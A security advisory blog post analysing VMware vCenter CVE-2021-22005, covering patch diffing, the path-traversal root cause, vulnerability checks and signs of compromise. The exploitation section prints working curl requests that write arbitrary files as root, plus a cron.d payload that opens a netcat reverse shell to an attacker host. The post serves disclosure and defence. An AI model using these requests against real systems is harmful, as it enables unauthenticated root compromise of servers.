Update 2 (2021-09-28)
@wvuuuuuuuuuuuuu disclosed how to get execution using this API endpoint. The method simply requires writing to /etc/cron.d. Both the /dataapp and /hyper/send handler RCE PoCs are now fully public.
Update 1 (2021-09-23, shortly after publishing)
@testanull on Twitter claims that CEIP is not a requirement for execution, which implies there are multiple vulnerabilities (points of weakness/independent fixes) that are part of CVE-2021-22005.
Overview
On September 21, VMware announced a new CVSS 9.8 vulnerability, CVE-2021-22005, as part of VMSA-2021-0020 – a critical unauthenticated, remote execution vulnerability in vCenter’s analytics service that administrators should patch immediately.
Note: This post was updated on 2021-09-28 to include details leading to remote code execution after the public availability of an exploit leading to execution was released for both API endpoints affected by CVE-2021-22005. Previously, we did not include these details to allow practitioners additional time to patch.
Key facts:
- Several entities appear to be scanning for vulnerable instances using the workaround provided by VMware.
- The root cause is related to user-supplied request parameter mishandling in VMware vCenter’s CEIP (Customer Experience Improvement Program) analytics service. CEIP is “opt-out” by default.
- VMware vCenter versions 6.7 and 7.0 are affected.
- Linux-based deployments are confirmed exploitable with code execution, Windows-based hosts are likely exploitable (with execution more difficult).
- Exploitation requires two unauthenticated web requests.
- Using a simple search query, Censys determined that just over 7,000 services on the public internet identify as VMWare vCenter. 3,264 hosts that are Internet-facing are potentially vulnerable, 436 are patched, and 1,369 are either not applicable (unaffected version) or have the workaround applied.
Technical analysis
A 9.8 CVSS vulnerability generally implies low-complexity remote execution, as this visualization from first.org’s CVSSv3 calculator demonstrates:
As it would turn out, VMware themselves published a significant “lead” on the exploit via their workaround, documented in the workaround KB for CVE-2021-22005:
14) To confirm that the workaround has taken effect, you can test by running the command below
curl -X POST “http://localhost:15080/analytics/telemetry/ph/api/hyper/send?_c&_i=test” -d “Test_Workaround” -H “Content-Type: application/json” -v 2>&1 | grep HTTP
This tells us that the specific API endpoint that is vulnerable is /analytics/telemetry/ph/api/hyper/send
. It’s important to note that the service port above (15080) is the internal port of the analytics service, though the vCenter web port (443) proxies requests to that service directly. You can simply send the same request to the https endpoint to achieve execution. So, with this tip from VMware, let’s analyze what was fixed.
Discovering the root cause
To view the differences between a vulnerable version of the software and a non-vulnerable version, we downloaded two ISO’s from VMWare’s website. According to the workaround KB, the patched version was released by VMWare in version 18356314 (7.0U2c). So the following two ISO’s were fetched:
- Vulnerable version: v17958471 (7.0U2b) from May 25, 2021
- Patched version: v18455184 (7.0U2d) from September 21, 2021
These ISO files contain plenty of library files, so to avoid boring the reader, we’ll skip ahead and note that the patched files of interest are in the RPM files for the VMware analytics service:
- VMware-analytics-7.0.2.00400-9102561.x86_64.rpm (patched, RPM is from 18455184)
- VMware-analytics-7.0.2.00000-8630354.x86_64.rpm (unpatched, RPM is from 17958471)
With these in hand, we can extract the RPM contents:
rpm2cpio <RPMFILE> | cpio -idmv
Which will produce a filesystem structure in the current directory:
$ ls
etc usr var
$ find etc
etc
etc/vmware
etc/vmware/appliance
etc/vmware/appliance/firewall
etc/vmware/appliance/firewall/vmware-analytics
etc/vmware/vm-support
etc/vmware/vm-support/analytics-noarch.mfx
etc/vmware/backup
etc/vmware/backup/manifests
etc/vmware/backup/manifests/analytics.json
...
$ find usr
find usr
usr
usr/lib
usr/lib/vmware-analytics
usr/lib/vmware-analytics/lib
usr/lib/vmware-analytics/lib/dataapp.txt
usr/lib/vmware-analytics/lib/vimVersions-7.0.2.jar
usr/lib/vmware-analytics/lib/cls-vmodl2-bindings-7.0.2.jar
usr/lib/vmware-analytics/lib/jcabi-log-0.17.jar
usr/lib/vmware-analytics/lib/analytics-push-telemetry-vcenter-7.0.2.jar
usr/lib/vmware-analytics/lib/analytics-common-vapi-7.0.2.jar
...
Now we can extract content from the class files into /tmp using unzip, and compare patched and unpatched versions, searching for references to “hyper”:
grep -lr hyper /tmp/unpatched/
/tmp/unpatched/com/vmware/vim/binding/vim/host/CpuSchedulerSystem.class
/tmp/unpatched/com/vmware/vim/binding/vim/host/ConfigInfo.class
/tmp/unpatched/com/vmware/vim/binding/vim/vm/device/VirtualVMCIDevice$Protocol.class
/tmp/unpatched/com/vmware/analytics/vapi/TelemetryDefinitions.class
/tmp/unpatched/com/vmware/ph/upload/rest/PhRestClientImpl.class
/tmp/unpatched/com/vmware/ph/phservice/push/telemetry/server/AsyncTelemetryController.class
/tmp/unpatched/com/vmware/ph/phservice/common/ph/RtsUriFactory.class
Having development experience (especially with Java and Spring) will help significantly here, as generally, API endpoints would be handled by “Controllers” in model-view-controller (MVC) based architectures. The most interesting class we can view here is AsyncTelemetryController
. Diffing the output of the CFR decompiler on the Java class files, we were able to determine the following function was changed from:
private Callable<ResponseEntity<Void>> handleSendRequest(final TelemetryService telemetryService, final RateLimiterProvider rateLimiterProvider, HttpServletRequest httpRequest, String version, final String collectorId, final String collectorInstanceId) throws IOException {
final TelemetryRequest telemetryRequest = AsyncTelemetryController.createTelemetryRequest(httpRequest, version, collectorId, collectorInstanceId);
return new Callable<ResponseEntity<Void>>(){
@Override
public ResponseEntity<Void> call() throws Exception {
if (!AsyncTelemetryController.this.isRequestPermitted(collectorId, collectorInstanceId, rateLimiterProvider)) {
return new ResponseEntity(HttpStatus.TOO_MANY_REQUESTS);
}
telemetryService.processTelemetry(telemetryRequest.getCollectorId(), telemetryRequest.getCollectorIntanceId(), new TelemetryRequest[]{telemetryRequest});
return new ResponseEntity(HttpStatus.CREATED);
}
};
}
To the following:
private Callable<ResponseEntity<Void>> handleSendRequest(final TelemetryService telemetryService, final RateLimiterProvider rateLimiterProvider, HttpServletRequest httpRequest, String version, final String collectorId, final String collectorInstanceId) throws IOException {
final TelemetryRequest telemetryRequest = AsyncTelemetryController.createTelemetryRequest(httpRequest, version, collectorId, collectorInstanceId);
return new Callable<ResponseEntity<Void>>(){
@Override
public ResponseEntity<Void> call() throws Exception {
if (!AsyncTelemetryController.this.isRequestPermitted(collectorId, collectorInstanceId, rateLimiterProvider)) {
return new ResponseEntity(HttpStatus.TOO_MANY_REQUESTS);
}
if (!IdFormatUtil.isValidCollectorInstanceId(collectorInstanceId) || !AsyncTelemetryController.this._collectorIdWhitelist.contains(collectorId)) {
_log.debug((Object)String.format("Incorrect collectorId '%s' or collectorInstanceId '%s'. Returning 400.", LogUtil.sanitiseForLog(collectorId), LogUtil.sanitiseForLog(collectorInstanceId)));
return new ResponseEntity(HttpStatus.BAD_REQUEST);
}
telemetryService.processTelemetry(telemetryRequest.getCollectorId(), telemetryRequest.getCollectorIntanceId(), new TelemetryRequest[]{telemetryRequest});
return new ResponseEntity(HttpStatus.CREATED);
}
};
}
This function is executed when an HTTP POST request is sent to either /ph-stg/api/hyper/send
or /ph/api/hyper/send
. In addition to the original rate-limiting check (isRequestPermitted(collectorId, collectorInstanceId, rateLimiterProvider)
), we can see two new conditionals:
!IdFormatUtil.isValidCollectorInstanceId(collectorInstanceId)
- A simple regex-based check (
[\w-]
) to assert the format of the collector-instance-id (the _i query parameter) is valid and does not contain invalid characters.
!AsyncTelemetryController.this._collectorIdWhitelist.contains(collectorId)
- Make sure the incoming collector-id is found in the
collectorIdWhitelist
array.
In order to prime the new collectorIdWhitelist
array, the following new property was added to /etc/vmware-analytics/phservice.properties
:
ph.collectorId.whitelist=vsphere.wcp.tp_1_0_0, SVC.1_0, SVC.1_0_U1, vsphere.gcm.1_0_0, vCSA.7_0, \
vCSA.7_0_1, vc_vcls.7_0_U2, vc_vlcm_dnp_7.0, vvts.7_0, vSphere.vapi.6_7, vSphere.vpxd.vmprov.6_7, \
vcenter-all.vpxd.drs.7_0u1, vcenter-all.vpxd.hdcs.7_0u2, h5c.6_8, vcenter_postgres, \
vc_lcm_api_stage2.6_7, vCSACLI.7_0_2, multisddc.1, hlm, hlm_gateway, vlcm.7_0_2, vlcm.7_0_3, testPush.1_0
Investigating exploitation
Understanding the new conditionals in AsyncTelemetryController makes vulnerability development trivial. You are, in effect, asking VMware’s unauthenticated analytics service (which collects telemetry data from other components of vCenter to report to VMware’s cloud) to write a file to disk in a path of your choosing. When data is sent to the telemetry service, it is first written to a log file using log4j2
into the either /var/log/vmware/analytics/stage
(if using the /ph-stg
endpoint), or /var/log/vmware/analytics/prod
(if using the /ph
endpoint).
We can see how the filename is generated by looking in the LogTelemetryService class:
@Override
public Future<Boolean> processTelemetry(String collectorId, String collectorInstanceId, TelemetryRequest[] telemetryRequests) {
ThreadContext.put((String)CTX_LOG_TELEMETRY_DIR_PATH, (String)this._logDirPath.normalize().toString());
ThreadContext.put((String)CTX_LOG_TELEMETRY_FILE_NAME, (String)LogTelemetryUtil.getLogFileNamePattern(collectorId, collectorInstanceId));
for (TelemetryRequest telemetryRequest : telemetryRequests) {
this._logger.info(LogTelemetryService.serializeToLogMessage(telemetryRequest));
}
return new ResultFuture<Boolean>(Boolean.TRUE);
}
The serialization call in processTelemetry
is uninteresting for secondary exploitation (meaning no chance of code execution using deserialization gadgets), as it is simply writing the POST body content that is captured in the request directly to the file.
However, the user controls the filename which log4j2 eventually uses to write the file. Thus, carefully crafted values in our _i
argument can result in files written to an arbitrary path on disk. In our testing, CEIP (Customer Experience Improvement Program) must be enabled for this exploit to work, as the telemetry code checks the CEIP service enrollment status and fails if it is disabled.
Without further ado, the exploit needs two stages:
First, the telemetry “collector” must be created, using /
as a prefix to _i
in order to create a directory under /var/log/vmware/analytics/prod
(creating a randomly-named file such as /var/log/vmware/analytics/prod/_c_i/1234.json
):
curl -kv "https://$VCENTER_HOST/analytics/telemetry/ph/api/hyper/send?_c=&_i=/$RANDOM" -H Content-Type: -d ""
In doing so, the server will create a directory under /var/log/vmware/analytics/prod/
with the format found in getLogFileNamePattern
. For example, _c=&_i=/stuff
will resolve to: /var/log/vmware/analytics/prod/_c_i/stuff.json
, and if the _c_i/
subdirectory does not exist within /var/log/vmware/analytics/prod/
, it will be created at this time.
Then we send the payload, which will write an arbitrary json file anywhere on the filesystem as the root user. Any parent directories in the path will also be created if they do not exist.
curl -kv "https://$VCENTER_HOST/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../tmp/foo" -H Content-Type: -d 'contents here will be directly written to /tmp/foo.json as root'
Using our first request’s example, the server will see this as: /var/log/vmware/analytics/prod/_c_i/../../../../../../tmp/foo.json
where it will write the contents of the request. The contents in the request body (denoted by -d) will be written directly to the file, as is (there is no requirement for the content to be JSON itself).
Once the file has been written, the last step is to find an external mechanism that will execute the data contained in the file. This is not difficult, as there are very well known locations in Linux-based operating systems that will read a file with any extension and execute its contents. Censys has confirmed execution, but will not release this last step to give defenders a bit more time to patch. Credit to wvu of Rapid7 for co-discovery of the details around this issue.
Update (2021-09-28): Since a path to RCE has been fully disclosed on Twitter, we have decided to update this post with those instructions. Execution as root can be obtained by writing to crontab (/etc/cron.d):
curl -kv "https://$VCENTER_HOST/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh $RHOST $RPORT"
Identifying vulnerability
VMware’s workaround mentions a cURL request (also in their python mitigation script) that can be sent to identify which hosts are vulnerable:
curl -X POST "http://localhost:15080/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "Test_Workaround" -H "Content-Type: application/json" -v 2>&1 | grep HTTP
However, this request will create a file in the analytics/prod log directory. Additionally, this endpoint will not determine if CEIP is enabled. If CEIP is disabled, in our testing, the vulnerable code paths would bail out (with a 201/Created). We theorize that disabling CEIP after it is enabled may not entirely eliminate the vulnerability, as the VMware analytics code contains caching mechanisms that may not be flushed.
A more relevant cURL request can be performed against the /analytics/telemetry/ph/api/level endpoint, which will not create a file:
curl -k -v "https://$VCENTER_HOST/analytics/telemetry/ph/api/level?_c=test"
- If the server responds with a 200/OK and anything other than “OFF” in the response body (such as “FULL”), it is vulnerable.
- If it responds with 200/OK and body content of “OFF,” it is likely not vulnerable, and also unpatched with no workaround applied.
- If it responds with 400/Bad Request, it is patched. This check makes use of the fact that patched instances will check the collectorId (_c) against a list of known/accepted collector IDs.
- If it responds with 404, it either does not apply, or the workaround has been applied. The workaround disables the affected API endpoints.
- Any other status code likely implies not applicable.
Identifying signs of compromise
Identifying compromise is simple. Look for directories created under the /var/log/vmware/analytics/prod
or /var/log/vmware/analytics/stage
directories. If there are subdirectories there, it is likely that an actor has executed an exploit against your host. Additionally, check for .json or .properties files in /etc/cron.d (or rc.local). This assumes the actor did not clean up their actions by removing the files/directories after achieving execution.
What do I do now?
This vulnerability, like the “updateova” issue of a few months ago, is fairly critical. Organizations should patch their vCenter instances as soon as they can. The patch appears to successfully resolve the issue.